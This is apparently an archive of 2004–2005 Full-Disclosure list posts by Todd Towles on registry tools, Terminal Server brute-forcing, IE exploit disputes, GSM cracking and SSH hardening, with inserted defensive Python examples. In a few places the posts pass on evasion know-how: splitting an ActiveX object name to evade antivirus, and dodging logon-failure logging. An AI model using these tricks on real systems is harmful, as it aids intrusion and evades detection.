RE: [Full-Disclosure] Windows Registry Analzyer

2005-03-03 Thread Todd Towles
Use RegMon for real-time Reg watching and try this product for Snapshot
compares. I haven't used it but it looks to be fun and there is a
write-up in PCWorld about it. 

---
Readme file of Regshot 1.61  2002/03/30
---
Please view whatsnew.txt for update info!

-
Package includes:
-
regshot.exe,language.ini,readme.txt,whatsnew.txt


-
Introduction:
-
RegShot is a small registry compare utility that allows you to quickly take a snapshot
of your registry and then compare it with a second one - done after doing system changes
or installing a new software product. The changes report can be produced in text or HTML
format and contains a list of all modifications that have taken place between snapshot1
and snapshot2. In addition, you can also specify folders (with sub folders) to be scanned
for changes as well. In version 1.60+ you can save your whole registry in a *.hiv file for
future use.
Note: Regshot is a FREEWARE!

 http://regshot.yeah.net/

PCWorld Page -
http://www.pcworld.com/downloads/file_description/0,fid,19540,00.asp

-Todd



 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Frank Knobbe
 Sent: Thursday, March 03, 2005 11:54 AM
 To: Danny
 Cc: Full-Disclosure (E-mail)
 Subject: Re: [Full-Disclosure] Windows Registry Analzyer
 
 On Thu, 2005-03-03 at 10:35 -0500, Danny wrote:
  Anyone know of any free tools to analyze what changes have 
 been made 
  to a Windows 2000/XP registry?
 
 There used to be a company/product called Intact, which 
 provided change monitoring of Registry settings as part of 
 its HIDS offerings. I'm not sure if they are still around or 
 got bought. Unfortunately it's not a free tool though.
 
 Regards,
 Frank
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
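A minimal snapshot-and-compare in the spirit of the Regshot readme quoted above, added here as an example; it is not Regshot's code or anything posted in the thread. It parses two constructed snapshots written in the text layout of a .reg export ([key] header lines followed by "name"=data lines) and produces the same kind of added/removed/changed report. The key paths and values are made up for the example.

```python
"""Registry snapshot compare (added example, not Regshot's code).

Reads two snapshots in .reg export layout and reports keys and values that
were added, removed or changed between snapshot 1 and snapshot 2.
"""
import re
from typing import Dict, List, Tuple

# Constructed snapshot taken before a software install.
SNAPSHOT1 = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Updater\\upd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example]
@="default"
"Version"="1.0"
"""

# Constructed snapshot taken after the install.
SNAPSHOT2 = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Updater\\upd.exe"
"NewAppTray"="C:\\Program Files\\NewApp\\tray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Example]
"Version"="1.1"

[HKEY_CURRENT_USER\Software\NewApp]
"Installed"=dword:00000001
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
# A value line is either @ (the key's default value) or a quoted name, then '=' and the data.
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

Snapshot = Dict[str, Dict[str, str]]


def parse_snapshot(text: str) -> Snapshot:
    """Map each key path to its {value name: data} dictionary."""
    keys: Snapshot = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        key_match = KEY_RE.match(line)
        if key_match:
            current = key_match.group(1)
            keys.setdefault(current, {})
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current is not None:
            name, data = value_match.groups()
            if name != "@":
                name = name[1:-1]  # drop the surrounding quotes
            keys[current][name] = data
    return keys


def compare(snap1: Snapshot, snap2: Snapshot) -> Dict[str, list]:
    """Regshot-style change report between two parsed snapshots."""
    report: Dict[str, list] = {"keys_added": [], "keys_removed": [], "values_added": [],
                               "values_removed": [], "values_changed": []}
    for key in sorted(set(snap1) | set(snap2)):
        before = snap1.get(key)
        after = snap2.get(key)
        if before is None:
            report["keys_added"].append(key)
        if after is None:
            report["keys_removed"].append(key)
        before = before or {}
        after = after or {}
        for name in sorted(set(before) | set(after)):
            if name not in before:
                report["values_added"].append((key, name, after[name]))
            elif name not in after:
                report["values_removed"].append((key, name, before[name]))
            elif before[name] != after[name]:
                report["values_changed"].append((key, name, before[name], after[name]))
    return report


def format_report(report: Dict[str, list]) -> str:
    """Plain-text rendering, one section per change type."""
    lines: List[str] = []
    for section, entries in report.items():
        lines.append(f"{section}: {len(entries)}")
        for entry in entries:
            if isinstance(entry, tuple):
                lines.append("  " + " -> ".join(str(part) for part in entry))
            else:
                lines.append("  " + entry)
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(compare(parse_snapshot(SNAPSHOT1), parse_snapshot(SNAPSHOT2))))
```

The report's entry order is sorted by key path and value name, so two runs over the same pair of snapshots produce identical text, which makes the output itself easy to diff over time.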


RE: [Full-Disclosure] hushmail.com, is this true?

2005-01-25 Thread Todd Towles
 I have to agree with James,

If you are using Hushmail's free e-mail service and expecting that to
hide you from the government, then you are in trouble. Might as well keep
e-mailing from your yahoo address anyways. You must assume all things
log your IP address, even anon proxies. Which most do...but don't give
your IP to the next computer. But tracing you is still possible, if the
government in that region wanted to find you...they could.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of james edwards
 Sent: Tuesday, January 25, 2005 3:51 PM
 To: full-disclosure@lists.netsys.com
 Subject: Re: [Full-Disclosure] hushmail.com, is this true? 
 
  Thank you Valdis, you were spot on.  I'm sorry, I must have been 
  misunderstood, my main concern IS a blunt legal object being used 
  against hushmail to find my identity.
 
 No business can ignore a judges orders to produce whatever 
 required information.
 The business can contest the request but if it is proven out 
 the information must be produced.
 
 If you are really concerned about your privacy, and not just 
 wasting our time, then never assume or expect another to 
 protect your privacy. There are many techniques out there to 
 remain anonymous.
 Any system that relies on just one free service to ensure 
 privacy is useless.
 
 j
 



RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities

2005-01-25 Thread Todd Towles
I agree, rename the Admin account and create a fake Admin account, and put
very good logging on it, because any attempts on this account would be
attacks.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Steve Tornio
 Sent: Tuesday, January 25, 2005 3:29 PM
 To: full-disclosure@lists.netsys.com
 Subject: Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities
 
 
 On Jan 25, 2005, at 2:38 PM, Curt Purdy wrote:
 
  Daniel Sichel wrote:
  snip
  Naturally  I
  don't like this answer because of horror stories I have 
 heard about 
  Terminal server. They claim there are no unfixed 
 vulnerabilities to 
  Terminal Server on Windows Server 2000 Service Pack 4.
 
  The problem with terminal server is not any vulnerablities 
 that can be 
  exploited, but the fact that administrator can be bruteforced (6 
  attempts followed by reconnect) and that it is screaming 
 its existence 
  on port 3889.
  If you use it, definitely change the port in the registry.
 
 Of course, one of the very first things you should do on a 
 Windows box is rename the administrator account, so this kind 
 of blind brute-forcing is not possible.
 
 Also, the problem you describe can be exacerbated in that 
 administrator can be brute-forced without creating a log 
 entry, by attempting 5 logons and disconnecting before 
 Windows disconnects and logs after the sixth failure.  This 
 was covered in a talk at Black Hat 2003, when Ryan Russell 
 and Tim Mullens released TSGrinder.  I don't know if they 
 continued work on it.
 

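The two defensive points in the thread above, as an added example that is not code from any of the posters: any logon attempt naming a decoy "Administrator" account is hostile by construction, and a client that reconnects after a few failures to stay under the failure-logging threshold still leaves a burst of short sessions from one source with no successful logon, so the session events can catch what the logon-failure audit misses. The log lines and their "timestamp source event account" layout are constructed for the example; the decoy name, window and session threshold are this example's own assumptions.

```python
"""Decoy-account and session-churn detections (added example, constructed log).

Real sources would be the Windows Security log (logon events) and the
Terminal Services session events; the one-line-per-event format here is
constructed so the example runs offline.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

DECOY_ACCOUNT = "Administrator"          # the well-known name kept as a decoy (assumed)
SESSION_WINDOW = timedelta(minutes=10)   # assumed tuning values
MIN_SESSIONS_IN_WINDOW = 3

# Constructed events: two legitimate users (192.0.2.x) and one client that
# opens a fresh session every couple of minutes and only ever fails.
SAMPLE_LOG = """\
2005-01-25T14:00:00 192.0.2.10 session_start -
2005-01-25T14:00:03 192.0.2.10 logon_success jdoe
2005-01-25T14:00:10 192.0.2.11 session_start -
2005-01-25T14:00:12 192.0.2.11 logon_failed jdoe
2005-01-25T14:00:20 192.0.2.11 logon_success jdoe
2005-01-25T14:01:00 198.51.100.7 session_start -
2005-01-25T14:01:02 198.51.100.7 logon_failed Administrator
2005-01-25T14:01:04 198.51.100.7 logon_failed Administrator
2005-01-25T14:01:05 198.51.100.7 session_end -
2005-01-25T14:03:00 198.51.100.7 session_start -
2005-01-25T14:03:02 198.51.100.7 logon_failed Administrator
2005-01-25T14:03:04 198.51.100.7 logon_failed Administrator
2005-01-25T14:03:05 198.51.100.7 session_end -
2005-01-25T14:06:00 198.51.100.7 session_start -
2005-01-25T14:06:02 198.51.100.7 logon_failed Administrator
2005-01-25T14:06:04 198.51.100.7 logon_failed Administrator
2005-01-25T14:06:05 198.51.100.7 session_end -
"""

Event = Tuple[datetime, str, str, str]


def parse_log(text: str) -> List[Event]:
    """(timestamp, source, event, account) per non-empty line."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, event, account = line.split()
        events.append((datetime.fromisoformat(ts), src, event, account))
    return events


def decoy_hits(events: List[Event], decoy: str = DECOY_ACCOUNT) -> List[Tuple[datetime, str, str]]:
    """Every logon attempt naming the decoy account, successful or not.
    Nobody legitimate uses the decoy, so each hit is an alert on its own."""
    return [(ts, src, event) for ts, src, event, account in events
            if event in ("logon_failed", "logon_success") and account == decoy]


def session_churn(events: List[Event], window: timedelta = SESSION_WINDOW,
                  min_sessions: int = MIN_SESSIONS_IN_WINDOW) -> Dict[str, int]:
    """Sources that opened min_sessions or more sessions inside one window
    without a single successful logon. Needs only session start events, so it
    still works when the failed logons themselves never reach the log."""
    starts: Dict[str, List[datetime]] = defaultdict(list)
    succeeded = set()
    for ts, src, event, _ in events:
        if event == "session_start":
            starts[src].append(ts)
        elif event == "logon_success":
            succeeded.add(src)
    flagged: Dict[str, int] = {}
    for src, times in starts.items():
        if src in succeeded:
            continue
        times.sort()
        lo = 0
        for hi in range(len(times)):           # sliding window over start times
            while times[hi] - times[lo] > window:
                lo += 1
            count = hi - lo + 1
            if count >= min_sessions:
                flagged[src] = max(flagged.get(src, 0), count)
    return flagged


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for ts, src, event in decoy_hits(events):
        print(f"ALERT decoy account touched: {ts} {src} {event}")
    for src, n in session_churn(events).items():
        print(f"ALERT session churn: {src} opened {n} sessions without logging on")
```

The second detection deliberately ignores logon events: it flags 198.51.100.7 from its three session starts alone, while the user at 192.0.2.11 who mistyped a password once is never flagged because that source went on to log on successfully.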


[Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbug alone

2005-01-11 Thread Todd Towles
 And the money payoff begins..

 -Original Message-
 From: jaynine [mailto:[EMAIL PROTECTED] 
 Sent: Tuesday, January 11, 2005 6:48 AM
 To: Patch Management Mailing List
 Subject: MS Antispyware makes deal to leave Weatherbug alone
 
 I read this rather disturbing article on another tech list. 
 Pardon me if someone here has already made reference to it.
 
 --- j9
 
 http://netrn.net/spywareblog/archives/2005/01/07/adware-vs-microsoft/
 
 1/7/2005
 Adware vs. Microsoft
 
 It's started folks. WeatherBug Miffed at Microsoft's Spyware 
 Classification .
 
 Microsoft Corp.'s newly released anti-spyware is flagging a 
 component of AWS Convergence Technologies' WeatherBug 
 application as a threat to Windows users, prompting an 
 immediate complaint from the Gaithersburg, Md.-based company.
 
 It appears this dispute has been resolved already: A 
 Microsoft spokeswoman said the beta product included a vendor 
 dispute-resolution mechanism to deal with complaints from 
 third-party companies.
 
 In the case of WeatherBug, the dispute-resolution process 
 paid immediate dividends. On Friday, the company received a 
 response from Microsoft with the good news that the current 
 signatures for Minibug will be removed.
 
 
 
 
 
 ---
 To unsubscribe send a blank email to 
 [EMAIL PROTECTED]
 



[Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles
No IE patch, it would seem.

 -Original Message-
 From: Eric Schultze [mailto:[EMAIL PROTECTED]
 Sent: Tuesday, January 11, 2005 12:09 PM
 To: Patch Management Mailing List
 Subject: New Security Patches from Microsoft
 
 Three new security bulletins have been released
 
 
 MS05-001 (Critical)Vulnerability in the Indexing Service 
 Could Allow Remote Code Execution (871250) Vulnerability in 
 HTML Help Could Allow Code Execution (890175) 
 http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
 
 MS05-002 (Critical)
 Vulnerability in Cursor and Icon Format Handling Could Allow 
 Remote Code Execution (891711) 
 http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 
 MS05-003 (Important)
 Vulnerability in the Indexing Service Could Allow Remote Code 
 Execution
 (871250)
 http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx
 
 
 
 Happy Testing
 
 Eric
 
 



RE: [Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles
 Agreed, I spoke a bit too fast. Peter Kruse e-mail me directly and
stated the same. Thanks for pointing that out.

 -Original Message-
 From: Larry Seltzer [mailto:[EMAIL PROTECTED] 
 Sent: Tuesday, January 11, 2005 2:04 PM
 To: Todd Towles; 'Mailing List - Full-Disclosure'
 Subject: RE: [Full-Disclosure] FW: New Security Patches from Microsoft
 
 No IE patch, it would seem.
 
 No, but...
 
  MS05-001 (Critical)Vulnerability in the Indexing Service 
 Could Allow 
  Remote Code Execution (871250) Vulnerability in HTML Help 
 Could Allow 
  Code Execution (890175) 
  http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
  
  MS05-002 (Critical)
  Vulnerability in Cursor and Icon Format Handling Could Allow Remote 
  Code Execution (891711) 
  http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
  
 
 Both of these address problems that have been exploited through IE.
 These are the ones that have gotten so much recent publicity.
 
 



RE: [Full-Disclosure] And you're proud of this Mike Evanchick?

2005-01-06 Thread Todd Towles



Sounds like you need AV and a bit of network security. If you are 
scared of IRC trojans and detectable viruses..then your time would be better 
spent putting those systems into place. Don't you think?

  
  
  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elle Chicka
  Sent: Monday, December 27, 2004 11:16 PM
  To: full-disclosure@lists.netsys.com
  Subject: [Full-Disclosure] And you're proud of this Mike Evanchick?
  
  You so proudly posted this:
  
  http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

  mike
  www.michaelevanchik.com
  
  
  Obviously you are just tickled to see that the kiddies were able to so 
  quickly turn your point/click sploit code into a virus to wreak havoc on my 
  network.
  Thanks a lot for helping to make all of us a little less secure over the 
  holidays.
  


RE: [Full-Disclosure] And you're proud of this Mike Evanchick?

2004-12-30 Thread Todd Towles



Umm..and you were the one giving cheers to Norton. Of course AV 
can be fooled..and of course a patch from microsoft is the only true way to fix 
the problem. 

She 
was attacking you for giving Cheers to Norton. I didn't release the POC, you 
did. I am happy Norton is detecting it. If you want to change your words right 
in the middle of the sentence, I really don't care.

By 
attacking me on a personal level, you have proven to me..to be unprofessional at 
best.

  
  
  From: Michael Evanchik [mailto:[EMAIL PROTECTED]
  Sent: Wednesday, December 29, 2004 5:03 PM
  To: Todd Towles; Elle Chicka; full-disclosure@lists.netsys.com
  Subject: Re: [Full-Disclosure] And you're proud of this Mike Evanchick?
  
  Todd,
  
  Listen, you are so wrong I can't believe you 
  even have the guts to post this. How stupid can you be? Norton or 
  any AVP can easily be fooled. The active x object "ca"+n b"+ +e crea" 
  +ted" like this. code changed around, or even different local code can 
  be used and tada AVP is fooled. Only a true patch from microsoft or 
  disable the help control in the registry is going to stop this. Her 
  concern is wise. 
  
  Mike
  www.michaelevanchik.com
  
  
  ----- Original Message -----
  From: Todd Towles
  To: Elle Chicka ; full-disclosure@lists.netsys.com
  Sent: Wednesday, December 29, 2004 9:36 AM
  Subject: RE: [Full-Disclosure] And you're proud of this Mike Evanchick?

Well, if you have Norton, it couldn't wreak havoc...now could 
it? Most of the AV companies are now detecting the exploit. This detection 
response is much faster than most of the other exploits which are wreaking 
havoc on your network, so it would sound.

Nice work to Norton.

  
  
  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elle Chicka
  Sent: Monday, December 27, 2004 11:16 PM
  To: full-disclosure@lists.netsys.com
  Subject: [Full-Disclosure] And you're proud of this Mike Evanchick?
  
  You so proudly posted this:
  
  http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

  mike
  www.michaelevanchik.com
  
  
  Obviously you are just tickled to see that the kiddies were able to 
  so quickly turn your point/click sploit code into a virus to wreak havoc 
  on my network.
  Thanks a lot for helping to make all of us a little less secure over 
  the holidays.
  


RE: [Full-Disclosure] And you're proud of this Mike Evanchick?

2004-12-29 Thread Todd Towles



Well, if you have Norton, it couldn't wreak havoc...now could it? Most of the AV 
companies are now detecting the exploit. This detection response is much faster 
than most of the other exploits which are wreaking havoc on your network, so it 
would sound.

Nice work to Norton.

  
  
  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elle Chicka
  Sent: Monday, December 27, 2004 11:16 PM
  To: full-disclosure@lists.netsys.com
  Subject: [Full-Disclosure] And you're proud of this Mike Evanchick?
  
  You so proudly posted this:
  
  http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html

  mike
  www.michaelevanchik.com
  
  
  Obviously you are just tickled to see that the kiddies were able to so 
  quickly turn your point/click sploit code into a virus to wreak havoc on my 
  network.
  Thanks a lot for helping to make all of us a little less secure over the 
  holidays.
  


RE: [Full-Disclosure] List of worm and trojan files

2004-12-29 Thread Todd Towles
GuidoZ is correct. I have seen companies ship new PCs out to customers
because of very bad infections and spyware...but of course they don't
patch them with anything (not even the LSASS holes)...so in two weeks
you have the same mess. 

I look at it and see Sasser, SD-Bot and I know what you have to do to
stop it. A huge corporation can't do the same?

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of GuidoZ
 Sent: Tuesday, December 28, 2004 3:17 PM
 To: Kevin
 Cc: Carilda A Thomas; full-disclosure@lists.netsys.com
 Subject: Re: [Full-Disclosure] List of worm and trojan files
 
  Assuming the attacker is competent, the only way to clean 
 a deeply 
  compromised machine is to reformat the drive and start from scratch.
  The truly paranoid will question whether just formatting 
 the drive is 
  sufficient.
 
 This isn't necessarily the case. While it will get the system 
 up and going again (and clean for the moment), if you don't 
 do any root cause analysis, then the problem will likely just 
 return. You need to do some investigating and figure out WHAT 
 the problem is and HOW it got there. Otherwise you haven't 
 fixed anything.
 
 This goes for any incident. Spyware/Adware/virus/trojan/worm 
 or your fav malware... they all have to get onto the system 
 somehow. Without knowing how and just reformatting, how have 
 you fixed the actual issue at hand?
 
 One of the definitions of insanity: Doing the same thing and 
 expecting a different result. Therefore, it's certifiably 
 insane to reload the system (to the previous state) and 
 expect it to not be reinfected. =)
 
 --
 Peace. ~G
 
 
 On Thu, 23 Dec 2004 23:03:39 -0600, Kevin [EMAIL PROTECTED] wrote:
  Carilda A Thomas [EMAIL PROTECTED] wrote:
  I have been looking but I cannot find a list all in one 
 place of the 
  various illegitimate files that various worms and trojans install 
  into Microsoft systems.
  
  What'd really help here is a list of MD5 checks for known bad
  binaries.  Obviously a custom build of sdbot or just a 
 simple hexedit 
  would defeat this, but such a list would still have value against 
  automated attacks, etc.
  
   Perhaps I should clarify about this list thing:  A friend 
 of mine is 
   apparently running a rogue email server and a rogue ftp 
 server, and 
   none of the virus checkers we have tried will determine 
 what program 
   or where.  I looked for a windows equivalent to lsof but there 
   doesn't appear to be one -
  
  Sysinternals has applications that, taken in combination, 
 do much of 
  what 'lsof' does under Unix.
  
  Specifically, tcpview
  (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) 
 will show you 
  any listening sockets, the associated process, and the 
 location from 
  which the process launched.  This should suffice to locate 
 a rogue FTP 
  service on a Windows PC.
  
  the one I found can only determine the program if
   it sees a packet go by and cannot find a quiescent 
 program.  The A/V 
   checkers do not flag an email server, considering it a legitimate 
   program.  Task manager is also destroyed, so there is no 
 help there.  
   I was hoping to find a list of illegitimate files for 
 which I could 
   check.
  
  Assuming the attacker is competent, the only way to clean 
 a deeply 
  compromised machine is to reformat the drive and start from scratch.
  The truly paranoid will question whether just formatting 
 the drive is 
  sufficient.
  
  Kevin Kadow
 



RE: [Full-Disclosure] Insecurity in Finnish parlament (computers)

2004-12-28 Thread Todd Towles
The NSA has bigger fish to worry about than Finland. =) Sorry

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Markus Jansson
 Sent: Sunday, December 26, 2004 10:17 AM
 To: James Tucker
 Cc: full-disclosure@lists.netsys.com
 Subject: Re: [Full-Disclosure] Insecurity in Finnish 
 parlament (computers)
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 On Sun, 26 Dec 2004 06:34:24 -0800 James Tucker 
 [EMAIL PROTECTED] wrote:
 The only charge appropriate for this case would be what is 
 informally 
 known as a 'gag order' and will require that you disprove 
 under a court 
 of law all statements made by Mr Jansson. In fact, you will have to 
 prove that Mr Jansson's comments are causing you loss of revenue or 
 damaging the overall reputation of your organisation through false 
 claims.
 
 Heh, I don't believe there are such laws here in Finland. If 
 we were talking about a private enterprise or individual 
 person, it would be possible if it's clear that I'm lying and 
 causing great damage.
 
 
 Items 1 to 9 on the list would suggest physical access to a device, 
 this is likely to have been contradictory to law.
 
 Perhaps, if you think that *I* got access by using illegal means.
 Then, of course, someone would have to prove that and if they 
 don't, well...
 
 
 It is also possible, that he has had only limited access to one 
 particular device, this would not be conclusive and may not 
 be a true 
 representation of the state of affairs of all devices owned by the 
 Finnish government.
 
 It is unlikely that all the computers have the same security 
 holes for many reasons, but I have gotten confirmations from 
 several computers/users that at least most of the issues I 
 have described exist in most, if not all, computers.
 
 
 Item 10 negates the likelihood of physical access, this would 
 contradict the above and would seem to make the story inconsistent.
 
 Maybe I didnt (if I did infact myself) have means to access 
 everything in those computers...  ;)
 
 
 Item 12 describes a well known problem, however this cannot 
 be fixed by 
 the users of the system.
 
 Oh yes, they could and should move from TeliaSonera to Elisa 
 for example, which uses secure COMP-128-3 and A5/3. It's been 
 years and years since this security hole was first shown so 
 they have had plenty of time, but they just don't give a drek 
 (both in TeliaSonera and in our parliament).
 
 
 Furthermore item 12 describes a scenario which simply is not 
 realistic. 
 Whilst the encryption algorithms in use may be crackable in 
 near real 
 time on a modern computer,
 
 A5/1 is crackable IN REAL TIME.
 http://www.gsm-security.net/faq/gsm-a3-a8-comp128-broken-
 security.shtml
 http://cryptome.org/gsm-crack-bbk.pdf
 http://www.gsm-security.net/faq/gsm-a5-broken-security.shtml
 
 
 dissection of the modulation scheme and isolation of a 
 single device is 
 most certainly NOT possible with a single laptop.
 
 Of course you need a few additional tools for that, but the 
 point is that the security of the system is broken.
 
 
 Most likely there are no civilians in Finland with the resources to 
 actually carry out the attack described.
 
 Some civilians do have. However, Finnish people are so 
 uninterested in politics that they really would bother. ;)  
 But other governments and intelligence agencies would surely 
 be interested and willing to wiretap and listen.
 
 
 Item 13 has more implications than have been considered and would 
 require more than a little insider knowledge to pull off the attack.
 
 Perhaps. The issue is that it can be done and they should 
 protect themselves against it.
 
 
 In terms of civilian liability this method of attack is absolutely 
 absurd. It would require co-ordination from several places and a 
 significant knowledge of existing infrastructure surrounding that 
 geographical location.
 
 That sort of information is easily obtained. No co-ordination 
 is really required, just put up a false GSM base station next 
 to our parliament building with a strong enough signal and voila!
 
 
 Such hard work is rarely necessary, as it would make more 
 sense to just 
 knock out the government worker and steal their laptop With a good 
 getaway plan this would take far less time, and not cost hundreds of 
 thousands of dollars.
 
 True, that attack is more potential especially since the 
 laptop HDDs are not encrypted (as they should be).
 
 
 We are discussing government security here, but if there is 
 something 
 occurring that would concern the NSA or MI5/6 then 
 encrypting your GSM 
 comms will be the least of your security concerns.
 
 I was under the impression that the NSA etc. spy for their living 
 on anything they can. I bet members of parliaments and their 
 assistants are very good targets.
 
 
 Firstly it would appear that Mark is a common sensationalist.
 
 Argumentum ad hominem. Red herring.
 
 
 Having taken part in quite unscientific objections with members of 
 

RE: [Full-Disclosure] Finnish perlament !?!?!

2004-12-27 Thread Todd Towles



Well, there are still several with FD - as Len stated last week, things aren't 
100% yet ..don't be too hard on him...lol

  
  
  From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Leeuwen, Allan van
  Sent: Friday, December 24, 2004 2:01 AM
  To: full-disclosure@lists.netsys.com
  Subject: [Full-Disclosure] Finnish perlament !?!?!
  
  Ok Ok, we got the message ... Mr Jansson has sent the information about your 
  insecure environment to a lot of places ...
  Personally I only received HIS email 1 time and YOURS 
  about 5 times (I haven't checked my other lists yet).
  So stop sending your threat email immediately or I will sue you for 
  spamming.
  
  Allan
  
  ===
  The information contained in this message may be confidential and is intended to be only for 
  the addressee. Should you receive this message unintentionally, please do not 
  use the contents herein and notify the sender immediately by return e-mail. 
  Although Orange has taken steps to ensure that this email and attachments are 
  free from any virus, you do need to verify the possibility of their existence 
  as Orange can take no responsibility for any computer virus which might be 
  transferred by way of this email.
  ===



RE: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow

2004-12-23 Thread Todd Towles
Very funny, nice work. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of [EMAIL PROTECTED]
 Sent: Wednesday, December 22, 2004 10:21 AM
 To: bugtraq@securityfocus.com; [EMAIL PROTECTED]; 
 full-disclosure@lists.netsys.com
 Subject: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow
 
  Shoe 1.0 - Remote Lace Overflow
  
 
  This Vulnerability is in reference to the new class of 
 remote vulnerabilities  indicated in: 
  http://www.securityfocus.com/archive/1/385078/2004-12-19/2004-12-25/2
  [Please read that first] 
 
  Discovery Credited To:
  --
   freshman - 0x90.org
   wxs  - 0x90.org
   txs  - 0x90.org
 
  Greets:
  ---
  Jonathan T. Rockway for being the smartest man alive.
 
  Description:
  
  A remote shoe vulnerability exists that could allow for 
 remote tripping and  possible exposure of sensitive data to 
 the pavement.
 
  Scope:
  --
  REMOTE
 
  Severity:
  -
  Hyper-Critical. This needs no explanation.
 
  Vulnerability:
  --
  Failure to properly tie your shoe could result in tripping 
 and a possible  broken face upon sudden deceleration when 
 hitting the pavement.
 
  Vulnerable Sizes: 
  -
  6 through 13. Other sizes may be vulnerable, but were 
 unavailable for testing.
 
  Exploitation:
  -
  You have a 100% secure walking system - you do not fall 
 down, or trip over  your own laces.  A remote attacker could 
 determine your shoe size by reading  your livejournal FROM 
 THE NETWORK and could MAIL YOU a shoe with extra long  laces. 
  You put the shoe on without tying it properly and suddenly 
 are exposed  to a REMOTE shoe vulnerability!
 
  Fix:
  
  Do not wear untrusted shoes sent to you. Other possible 
 workarounds include  sandals (aka. flip-flops). These are a 
 good work-around and are widely  available for those 
 concerned about their security. 
 
  Vendor Notification:
  
  Vendors were not notified at the time of this writing.  We 
 have chosen not to give advance notice because the fault is 
 not always with the vendor of the shoe as a REMOTE PERSON 
 could SNAIL MAIL a LOCAL USER a vulnerable shoe.
 
  We at 0x90.org believe that the users should be happy they 
 were notified about this.  Imagine the mass destruction and 
 chaos that would ensue if we unleashed a REMOTE SHOE 
 VULNERABILITY WORM into the wild.  At this time we have 
 chosen not to do that, mostly because we can not afford all 
 the stamps to mail vulnerable shoes to the public.
 
 



RE: [Full-Disclosure] OpenSSH is a good choice?

2004-12-22 Thread Todd Towles
I would believe Security through obscurity is bad but Obscurity in
Security is good. As long as it is a step in your layered defense
stance, obscurity is ok, but don't rely on it for everything. Which is
good advice for everything anyways. Hide your port but take active steps
to secure SSH deeper, disable V1, use only strong ciphers...make
obscurity part of your security plan but not the only step in the plan. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf 
 Of Willem Koenings
 Sent: Tuesday, December 21, 2004 4:37 PM
 To: full-disclosure@lists.netsys.com
 Subject: Re: [Full-Disclosure] OpenSSH is a good choice?
 
 on Tue Dec 21 14:54:44 EST 2004, Ron DuFresne wrote
 
  the non std port advice is not worth much, security through 
 obscurity 
  kinda thing.
 
 wrong. non standard port helps quite well against automated scans.
 most targets nowadays are searched via automated scans. if 
 you are painted red, you get attention. this is the first step - 
 stay gray. but if you are already set up as a target, this 
 would not help you. this helps you NOT getting set up as a target 
 for someone who is just searching some servers for fun - scriptkiddies.
 
 W.

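The settings argued over in the thread above (non-standard port, SSHv1 off, strong ciphers only) turned into a small sshd_config audit, added here as an example; it is not code from the thread or from OpenSSH. Root login and password authentication are included as the "deeper" steps. The two configs are constructed samples of a weak and a hardened server, the weak-cipher markers and defaults are this example's own assumptions, and the Protocol directive only exists on older OpenSSH releases that still supported SSHv1. The cipher names in the hardened sample are current OpenSSH identifiers, not ones available in 2004.

```python
"""sshd_config audit for the points raised above (added example).

Comments are skipped, the last occurrence of a keyword wins, and Match
blocks are not modelled; both configs below are constructed.
"""
from typing import Dict, List

WEAK_CONFIG = """\
Port 22
Protocol 2,1
Ciphers 3des-cbc,aes128-cbc,aes128-ctr
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
# off the default port: the obscurity layer
Port 2222
# SSHv1 disabled
Protocol 2
Ciphers aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""

# Substrings of cipher names this example treats as weak (assumed list).
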